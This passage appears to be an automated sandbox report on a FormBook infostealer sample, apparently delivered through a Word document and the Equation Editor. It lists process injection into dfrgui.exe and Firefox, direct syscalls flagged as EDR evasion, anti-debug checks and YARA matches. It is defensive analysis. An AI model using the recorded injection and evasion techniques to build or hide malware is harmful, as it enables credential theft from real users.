            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\op33779.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\op33779.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\op33779.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\op33779.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\op33779.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\op33779.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\op33779.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\op33779.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\op33779.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\op33779.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\op33779.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\op33779.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\op33779.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\op33779.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\op33779.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\op33779.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\op33779.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\op33779.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\op33779.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\op33779.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\op33779.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\op33779.scrMemory allocated: 510000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\op33779.scrMemory allocated: 2030000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\op33779.scrMemory allocated: 1CA0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00B20101 rdtsc 6_2_00B20101
            Source: C:\Users\user\AppData\Roaming\op33779.scrThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeWindow / User API: threadDelayed 9827Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sqlite3.dllJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2780Thread sleep time: -120000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\op33779.scr TID: 3092Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exe TID: 3292Thread sleep count: 130 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exe TID: 3292Thread sleep time: -260000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exe TID: 3528Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exe TID: 3292Thread sleep count: 9827 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exe TID: 3292Thread sleep time: -19654000s >= -30000sJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3264Thread sleep time: -120000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\dfrgui.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\dfrgui.exeFile Volume queried: C:\Users\user\AppData\Local FullSizeInformationJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\op33779.scrThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\op33779.scrProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\op33779.scrProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00B20101 rdtsc 6_2_00B20101
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_001D8BA3 LdrLoadDll,6_2_001D8BA3
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00AC0080 mov ecx, dword ptr fs:[00000030h]6_2_00AC0080
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00AC00EA mov eax, dword ptr fs:[00000030h]6_2_00AC00EA
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00AE26F8 mov eax, dword ptr fs:[00000030h]6_2_00AE26F8
            Source: C:\Users\user\AppData\Roaming\op33779.scrMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            .NET source code references suspicious native API functions
            Source: 5.2.op33779.scr.203f154.3.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
            Source: 5.2.op33779.scr.203f154.3.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
            Source: 5.2.op33779.scr.203f154.3.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.csReference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeNtQueryInformationProcess: Direct from: 0x774CFAFAJump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeNtCreateUserProcess: Direct from: 0x774D093EJump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeNtCreateKey: Direct from: 0x774CFB62Jump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeNtQuerySystemInformation: Direct from: 0x774D20DEJump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeNtQueryDirectoryFile: Direct from: 0x774CFDBAJump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeNtClose: Direct from: 0x774CFA02
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeNtWriteVirtualMemory: Direct from: 0x774D213EJump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeNtCreateFile: Direct from: 0x774D00D6Jump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeNtSetTimer: Direct from: 0x774D021AJump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeNtOpenFile: Direct from: 0x774CFD86Jump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeNtSetInformationThread: Direct from: 0x774E9893Jump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeNtOpenKeyEx: Direct from: 0x774CFA4AJump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeNtAllocateVirtualMemory: Direct from: 0x774CFAE2Jump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeNtResumeThread: Direct from: 0x774D008DJump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeNtOpenKeyEx: Direct from: 0x774D103AJump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeNtUnmapViewOfSection: Direct from: 0x774CFCA2Jump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeNtDelayExecution: Direct from: 0x774CFDA1Jump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeNtSetInformationProcess: Direct from: 0x774CFB4AJump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeNtSetInformationThread: Direct from: 0x774CF9CEJump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeNtReadFile: Direct from: 0x774CF915Jump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeNtMapViewOfSection: Direct from: 0x774CFC72Jump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeNtCreateThreadEx: Direct from: 0x774D08C6Jump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeNtDeviceIoControlFile: Direct from: 0x774CF931Jump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeNtRequestWaitReplyPort: Direct from: 0x753C6BCEJump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeNtQueryValueKey: Direct from: 0x774CFACAJump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeNtOpenSection: Direct from: 0x774CFDEAJump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeNtProtectVirtualMemory: Direct from: 0x774D005AJump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeNtWriteVirtualMemory: Direct from: 0x774CFE36Jump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeNtRequestWaitReplyPort: Direct from: 0x756F8D92Jump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeNtQueryVolumeInformationFile: Direct from: 0x774CFFAEJump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeNtNotifyChangeKey: Direct from: 0x774D0F92Jump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeNtQueryAttributesFile: Direct from: 0x774CFE7EJump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeNtReadVirtualMemory: Direct from: 0x774CFEB2Jump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeNtSetTimer: Direct from: 0x774E98D5Jump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeNtSetInformationFile: Direct from: 0x774CFC5AJump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeNtQuerySystemInformation: Direct from: 0x774CFDD2Jump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\AppData\Roaming\op33779.scrMemory written: C:\Users\user\AppData\Roaming\op33779.scr base: 1C0000 value starts with: 4D5AJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\AppData\Roaming\op33779.scrSection loaded: NULL target: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exe protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeSection loaded: NULL target: C:\Users\user\AppData\Roaming\op33779.scr protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeSection loaded: NULL target: C:\Windows\SysWOW64\dfrgui.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: NULL target: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: NULL target: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\dfrgui.exeThread APC queued: target process: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\op33779.scr "C:\Users\user\AppData\Roaming\op33779.scr"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\op33779.scrProcess created: C:\Users\user\AppData\Roaming\op33779.scr "C:\Users\user\AppData\Roaming\op33779.scr"Jump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeProcess created: C:\Windows\SysWOW64\dfrgui.exe "C:\Windows\SysWOW64\dfrgui.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: gpgLFpElQuxhEi.exe, 00000007.00000000.384267441.0000000000B70000.00000002.00000001.00040000.00000000.sdmp, gpgLFpElQuxhEi.exe, 00000007.00000002.628883971.0000000000B70000.00000002.00000001.00040000.00000000.sdmp, gpgLFpElQuxhEi.exe, 0000000C.00000000.414405107.0000000000B70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: gpgLFpElQuxhEi.exe, 00000007.00000000.384267441.0000000000B70000.00000002.00000001.00040000.00000000.sdmp, gpgLFpElQuxhEi.exe, 00000007.00000002.628883971.0000000000B70000.00000002.00000001.00040000.00000000.sdmp, gpgLFpElQuxhEi.exe, 0000000C.00000000.414405107.0000000000B70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: gpgLFpElQuxhEi.exe, 00000007.00000000.384267441.0000000000B70000.00000002.00000001.00040000.00000000.sdmp, gpgLFpElQuxhEi.exe, 00000007.00000002.628883971.0000000000B70000.00000002.00000001.00040000.00000000.sdmp, gpgLFpElQuxhEi.exe, 0000000C.00000000.414405107.0000000000B70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: !Progman
            Source: C:\Users\user\AppData\Roaming\op33779.scrQueries volume information: C:\Users\user\AppData\Roaming\op33779.scr VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9l3pz.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9l3pz.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9l3pz.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9l3pz.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9l3pz.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9l3pz.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9l3pz.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9l3pz.zip VolumeInformationJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 6.2.op33779.scr.1c0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.op33779.scr.1c0000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.628678228.0000000000220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.628640163.00000000001A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.628854731.00000000009D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.628930970.0000000005C50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.477556208.0000000000270000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.401593026.00000000002A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
